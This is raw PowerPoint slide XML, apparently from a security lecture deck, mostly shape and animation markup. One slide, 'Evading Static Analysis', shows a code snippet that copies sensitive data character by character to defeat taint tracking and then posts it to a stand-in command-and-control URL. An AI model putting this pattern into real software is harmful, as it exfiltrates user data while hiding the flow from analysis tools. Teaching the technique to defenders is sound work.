            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2082142" y="2340770"/>
            <a:ext cx="379413" cy="36671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 altLang="en-US" sz="1200">
              <a:latin typeface="Courier New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Oval 41"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3832092" y="2302694"/>
            <a:ext cx="379413" cy="36671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 altLang="en-US" sz="1200">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Times New Roman" charset="0"/>
              <a:cs typeface="Times New Roman" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Freeform 43"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2390753" y="1616428"/>
            <a:ext cx="568325" cy="533400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 22 w 358"/>
              <a:gd name="T1" fmla="*/ 0 h 336"/>
              <a:gd name="T2" fmla="*/ 56 w 358"/>
              <a:gd name="T3" fmla="*/ 183 h 336"/>
              <a:gd name="T4" fmla="*/ 358 w 358"/>
              <a:gd name="T5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58" h="336">
                <a:moveTo>
                  <a:pt x="22" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="28" y="30"/>
                  <a:pt x="0" y="127"/>
                  <a:pt x="56" y="183"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="112" y="239"/>
                  <a:pt x="295" y="304"/>
                  <a:pt x="358" y="336"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="50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44"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3382447" y="2025397"/>
            <a:ext cx="614154" cy="263525"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 432"/>
              <a:gd name="T1" fmla="*/ 22 h 166"/>
              <a:gd name="T2" fmla="*/ 309 w 432"/>
              <a:gd name="T3" fmla="*/ 24 h 166"/>
              <a:gd name="T4" fmla="*/ 432 w 432"/>
              <a:gd name="T5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166">
                <a:moveTo>
                  <a:pt x="0" y="22"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="51" y="22"/>
                  <a:pt x="237" y="0"/>
                  <a:pt x="309" y="24"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="381" y="48"/>
                  <a:pt x="407" y="137"/>
                  <a:pt x="432" y="166"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="50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45"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3901415" y="2714343"/>
            <a:ext cx="838200" cy="800100"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 96 w 528"/>
              <a:gd name="T1" fmla="*/ 24 h 504"/>
              <a:gd name="T2" fmla="*/ 48 w 528"/>
              <a:gd name="T3" fmla="*/ 24 h 504"/>
              <a:gd name="T4" fmla="*/ 384 w 528"/>
              <a:gd name="T5" fmla="*/ 168 h 504"/>
              <a:gd name="T6" fmla="*/ 336 w 528"/>
              <a:gd name="T7" fmla="*/ 312 h 504"/>
              <a:gd name="T8" fmla="*/ 528 w 528"/>
              <a:gd name="T9" fmla="*/ 50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8" h="504">
                <a:moveTo>
                  <a:pt x="96" y="24"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="48" y="12"/>
                  <a:pt x="0" y="0"/>
                  <a:pt x="48" y="24"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="96" y="48"/>
                  <a:pt x="336" y="120"/>
                  <a:pt x="384" y="168"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="432" y="216"/>
                  <a:pt x="312" y="256"/>
                  <a:pt x="336" y="312"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="360" y="368"/>
                  <a:pt x="444" y="436"/>
                  <a:pt x="528" y="504"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="50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7"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4294703" y="2400111"/>
            <a:ext cx="1892712" cy="223890"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1248"/>
              <a:gd name="T1" fmla="*/ 0 h 960"/>
              <a:gd name="T2" fmla="*/ 624 w 1248"/>
              <a:gd name="T3" fmla="*/ 48 h 960"/>
              <a:gd name="T4" fmla="*/ 1008 w 1248"/>
              <a:gd name="T5" fmla="*/ 240 h 960"/>
              <a:gd name="T6" fmla="*/ 1248 w 1248"/>
              <a:gd name="T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48" h="960">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="228" y="4"/>
                  <a:pt x="456" y="8"/>
                  <a:pt x="624" y="48"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="792" y="88"/>
                  <a:pt x="904" y="88"/>
                  <a:pt x="1008" y="240"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1112" y="392"/>
                  <a:pt x="1180" y="676"/>
                  <a:pt x="1248" y="960"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="50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48"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4986503" y="3121778"/>
            <a:ext cx="1143000" cy="1130327"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 768 w 768"/>
              <a:gd name="T1" fmla="*/ 0 h 720"/>
              <a:gd name="T2" fmla="*/ 480 w 768"/>
              <a:gd name="T3" fmla="*/ 96 h 720"/>
              <a:gd name="T4" fmla="*/ 576 w 768"/>
              <a:gd name="T5" fmla="*/ 384 h 720"/>
              <a:gd name="T6" fmla="*/ 0 w 768"/>
              <a:gd name="T7" fmla="*/ 72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8" h="720">
                <a:moveTo>
                  <a:pt x="768" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="640" y="16"/>
                  <a:pt x="512" y="32"/>
                  <a:pt x="480" y="96"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="448" y="160"/>
                  <a:pt x="656" y="280"/>
                  <a:pt x="576" y="384"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="496" y="488"/>
                  <a:pt x="248" y="604"/>
                  <a:pt x="0" y="720"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="50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Freeform 50"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2452028" y="2304682"/>
            <a:ext cx="717550" cy="196851"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 452 w 452"/>
              <a:gd name="T1" fmla="*/ 9 h 124"/>
              <a:gd name="T2" fmla="*/ 365 w 452"/>
              <a:gd name="T3" fmla="*/ 123 h 124"/>
              <a:gd name="T4" fmla="*/ 183 w 452"/>
              <a:gd name="T5" fmla="*/ 4 h 124"/>
              <a:gd name="T6" fmla="*/ 0 w 452"/>
              <a:gd name="T7" fmla="*/ 96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2" h="124">
                <a:moveTo>
                  <a:pt x="452" y="9"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="438" y="28"/>
                  <a:pt x="410" y="124"/>
                  <a:pt x="365" y="123"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="320" y="122"/>
                  <a:pt x="244" y="8"/>
                  <a:pt x="183" y="4"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="122" y="0"/>
                  <a:pt x="38" y="77"/>
                  <a:pt x="0" y="96"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="50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94535" y="1201484"/>
            <a:ext cx="465138" cy="4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56535" y="1887284"/>
            <a:ext cx="465138" cy="4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42135" y="2304798"/>
            <a:ext cx="465138" cy="4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94735" y="2268284"/>
            <a:ext cx="465138" cy="4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04535" y="2701145"/>
            <a:ext cx="465138" cy="4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32935" y="4185458"/>
            <a:ext cx="465138" cy="4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94735" y="2268284"/>
            <a:ext cx="465138" cy="4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61"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6520792" y="2728105"/>
            <a:ext cx="379413" cy="36671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 altLang="en-US" sz="1200">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Times New Roman" charset="0"/>
              <a:cs typeface="Times New Roman" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Oval 62"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6993867" y="2728105"/>
            <a:ext cx="379413" cy="36671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 altLang="en-US" sz="1200">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Times New Roman" charset="0"/>
              <a:cs typeface="Times New Roman" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Oval 63"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7482817" y="2728105"/>
            <a:ext cx="379413" cy="366713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 altLang="en-US" sz="1200">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Times New Roman" charset="0"/>
              <a:cs typeface="Times New Roman" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Freeform 65"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5796891" y="3307351"/>
            <a:ext cx="1717675" cy="947739"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 906 w 1082"/>
              <a:gd name="T1" fmla="*/ 0 h 723"/>
              <a:gd name="T2" fmla="*/ 994 w 1082"/>
              <a:gd name="T3" fmla="*/ 271 h 723"/>
              <a:gd name="T4" fmla="*/ 378 w 1082"/>
              <a:gd name="T5" fmla="*/ 299 h 723"/>
              <a:gd name="T6" fmla="*/ 0 w 1082"/>
              <a:gd name="T7" fmla="*/ 723 h 7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2" h="723">
                <a:moveTo>
                  <a:pt x="906" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="921" y="45"/>
                  <a:pt x="1082" y="221"/>
                  <a:pt x="994" y="271"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="906" y="321"/>
                  <a:pt x="544" y="224"/>
                  <a:pt x="378" y="299"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="212" y="374"/>
                  <a:pt x="79" y="635"/>
                  <a:pt x="0" y="723"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="50000"/>
              </a:schemeClr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" name="Picture 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96279" y="2698405"/>
            <a:ext cx="465138" cy="44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ectangle 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18876832">
            <a:off x="4441831" y="3525469"/>
            <a:ext cx="685800" cy="4851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 sz="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Times New Roman" charset="0"/>
              <a:cs typeface="Times New Roman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182372" y="3994531"/>
            <a:ext cx="715237" cy="715237"/>
            <a:chOff x="6795500" y="3882713"/>
            <a:chExt cx="715237" cy="715237"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Oval 2"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6795500" y="3882713"/>
              <a:ext cx="715237" cy="7152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6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229" y="3926383"/>
              <a:ext cx="616633" cy="624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85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25 C 0.00104 0.01828 -0.00677 0.03449 0.00486 0.04722 C 0.01649 0.05995 0.06024 0.07638 0.06944 0.08888 C 0.07864 0.10138 0.0533 0.10486 0.06007 0.12152 C 0.06684 0.13819 0.0993 0.175 0.10955 0.18888 " pathEditMode="relative" rAng="0" ptsTypes="aaa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8819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8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3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8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300"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="1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8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89E-6 -0.00031 C 0.02119 -0.00802 0.04255 -0.01511 0.05523 -0.00555 C 0.06791 0.00401 0.07277 0.04319 0.07624 0.0583 C 0.08007 0.07403 0.07868 0.08082 0.07624 0.08606 C 0.07381 0.09161 0.07347 0.091 0.06183 0.0913 C 0.05019 0.09223 0.02154 0.08575 0.0066 0.08976 C -0.00833 0.09346 -0.0198 0.10549 -0.02761 0.11567 C -0.03543 0.12523 -0.03647 0.13572 -0.04133 0.14868 C -0.04637 0.16071 -0.05245 0.17798 -0.05679 0.19186 C -0.06113 0.20481 -0.06599 0.2116 -0.06721 0.22826 C -0.06842 0.2446 -0.06669 0.26743 -0.06478 0.29056 " pathEditMode="relative" rAng="0" ptsTypes="AAAAAAAAAAA">
                                      <p:cBhvr>
                                        <p:cTn id="16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7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6" grpId="1" animBg="1"/>
      <p:bldP spid="27" grpId="0" animBg="1"/>
      <p:bldP spid="35" grpId="0" animBg="1"/>
      <p:bldP spid="36" grpId="0" animBg="1"/>
      <p:bldP spid="37" grpId="0" animBg="1"/>
      <p:bldP spid="38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45941"/>
            <a:ext cx="9144000" cy="3897559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Evading Static </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Analysis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25489" y="1930240"/>
            <a:ext cx="7835785" cy="2756874"/>
            <a:chOff x="746760" y="2736426"/>
            <a:chExt cx="7835785" cy="3753082"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Rounded Rectangle 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="746760" y="2736426"/>
              <a:ext cx="7718815" cy="3753082"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 4936"/>
              </a:avLst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99332" y="3145193"/>
              <a:ext cx="7683213" cy="283971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B91AF"/>
                  </a:solidFill>
                  <a:latin typeface="Menlo" charset="0"/>
                  <a:ea typeface="Menlo" charset="0"/>
                  <a:cs typeface="Menlo" charset="0"/>
                </a:rPr>
                <a:t>String</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Menlo" charset="0"/>
                  <a:ea typeface="Menlo" charset="0"/>
                  <a:cs typeface="Menlo" charset="0"/>
                </a:rPr>
                <a:t> data = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Menlo" charset="0"/>
                  <a:ea typeface="Menlo" charset="0"/>
                  <a:cs typeface="Menlo" charset="0"/>
                </a:rPr>
                <a:t>getSensitiveData</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Menlo" charset="0"/>
                  <a:ea typeface="Menlo" charset="0"/>
                  <a:cs typeface="Menlo" charset="0"/>
                </a:rPr>
                <a:t>();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srgbClr val="2B91AF"/>
                  </a:solidFill>
                  <a:latin typeface="Menlo" charset="0"/>
                  <a:ea typeface="Menlo" charset="0"/>
                  <a:cs typeface="Menlo" charset="0"/>
                </a:rPr>
                <a:t>String</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Menlo" charset="0"/>
                  <a:ea typeface="Menlo" charset="0"/>
                  <a:cs typeface="Menlo" charset="0"/>
                </a:rPr>
                <a:t> data2 = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="0F7001"/>
                  </a:solidFill>
                  <a:latin typeface="Menlo" charset="0"/>
                  <a:ea typeface="Menlo" charset="0"/>
                  <a:cs typeface="Menlo" charset="0"/>
                </a:rPr>
                <a:t>""</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Menlo" charset="0"/>
                  <a:ea typeface="Menlo" charset="0"/>
                  <a:cs typeface="Menlo" charset="0"/>
                </a:rPr>
                <a:t>;</a:t>
              </a:r>
            </a:p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rgbClr val="00006D"/>
                  </a:solidFill>
                  <a:latin typeface="Menlo" charset="0"/>
                  <a:ea typeface="Menlo" charset="0"/>
                  <a:cs typeface="Menlo" charset="0"/>
                </a:rPr>
                <a:t>for </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Menlo" charset="0"/>
                  <a:ea typeface="Menlo" charset="0"/>
                  <a:cs typeface="Menlo" charset="0"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="00006D"/>
                  </a:solidFill>
                  <a:latin typeface="Menlo" charset="0"/>
                  <a:ea typeface="Menlo" charset="0"/>
                  <a:cs typeface="Menlo" charset="0"/>
                </a:rPr>
                <a:t>int</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="00006D"/>
                  </a:solidFill>
                  <a:latin typeface="Menlo" charset="0"/>
                  <a:ea typeface="Menlo" charset="0"/>
                  <a:cs typeface="Menlo" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Menlo-Regular" charset="0"/>
                </a:rPr>
                <a:t>i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=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                  <a:latin typeface="Menlo-Regular" charset="0"/>
                </a:rPr>
                <a:t>0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; </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Menlo-Regular" charset="0"/>
                </a:rPr>
                <a:t>i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&lt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Menlo-Regular" charset="0"/>
                </a:rPr>
                <a:t>data.length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(); </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Menlo-Regular" charset="0"/>
                </a:rPr>
                <a:t>i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++) {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    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="00006D"/>
                  </a:solidFill>
                  <a:latin typeface="Menlo-Bold" charset="0"/>
                </a:rPr>
                <a:t>if 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(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Menlo-Regular" charset="0"/>
                </a:rPr>
                <a:t>data.charAt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(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Menlo-Regular" charset="0"/>
                </a:rPr>
                <a:t>i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) == </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="0F7001"/>
                  </a:solidFill>
                  <a:latin typeface="Menlo-Bold" charset="0"/>
                </a:rPr>
                <a:t>'a'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)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="120000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="fr-FR" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Menlo-Regular" charset="0"/>
                </a:rPr>
                <a:t>        data2 += </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="0F7001"/>
                  </a:solidFill>
                  <a:latin typeface="Menlo-Bold" charset="0"/>
                </a:rPr>
                <a:t>'a'</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fr-FR" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Menlo-Regular" charset="0"/>
                </a:rPr>
                <a:t>;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="120000"/>
                </a:lnSpc>
              </a:pP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    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="00006D"/>
                  </a:solidFill>
                  <a:latin typeface="Menlo-Bold" charset="0"/>
                </a:rPr>
                <a:t>if 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(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Menlo-Regular" charset="0"/>
                </a:rPr>
                <a:t>data.charAt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(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Menlo-Regular" charset="0"/>
                </a:rPr>
                <a:t>i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) == </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="0F7001"/>
                  </a:solidFill>
                  <a:latin typeface="Menlo-Bold" charset="0"/>
                </a:rPr>
                <a:t>'b'</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Menlo-Regular" charset="0"/>
                </a:rPr>
                <a:t>)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="120000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="fr-FR" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Menlo-Regular" charset="0"/>
                </a:rPr>
                <a:t>        data2 += </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="0F7001"/>
                  </a:solidFill>
                  <a:latin typeface="Menlo-Bold" charset="0"/>
                </a:rPr>
                <a:t>'b</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0F7001"/>
                  </a:solidFill>
                  <a:latin typeface="Menlo-Bold" charset="0"/>
                </a:rPr>
                <a:t>'</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Menlo-Regular" charset="0"/>
                </a:rPr>
                <a:t>;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="120000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="fr-FR" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Menlo-Regular" charset="0"/>
                </a:rPr>
                <a:t>	</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="00B050"/>
                  </a:solidFill>
                  <a:latin typeface="Menlo-Regular" charset="0"/>
                </a:rPr>
                <a:t>...</a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Menlo-Regular" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="120000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="fr-FR" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Menlo-Regular" charset="0"/>
                </a:rPr>
                <a:t>}</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="120000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Menlo-Regular" charset="0"/>
                </a:rPr>
                <a:t>PostRequest</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fr-FR" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Menlo-Regular" charset="0"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="0F7001"/>
                  </a:solidFill>
                  <a:latin typeface="Menlo-Bold" charset="0"/>
                </a:rPr>
                <a:t>"</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fr-FR" sz="1400" b="1" u="sng" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="386EFF"/>
                  </a:solidFill>
                  <a:latin typeface="Menlo-Bold" charset="0"/>
                  <a:hlinkClick r:id="rId2"/>
                </a:rPr>
                <a:t>http://www.remote.cnc/data.php</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fr-FR" sz="1400" b="1" u="sng" dirty="0">
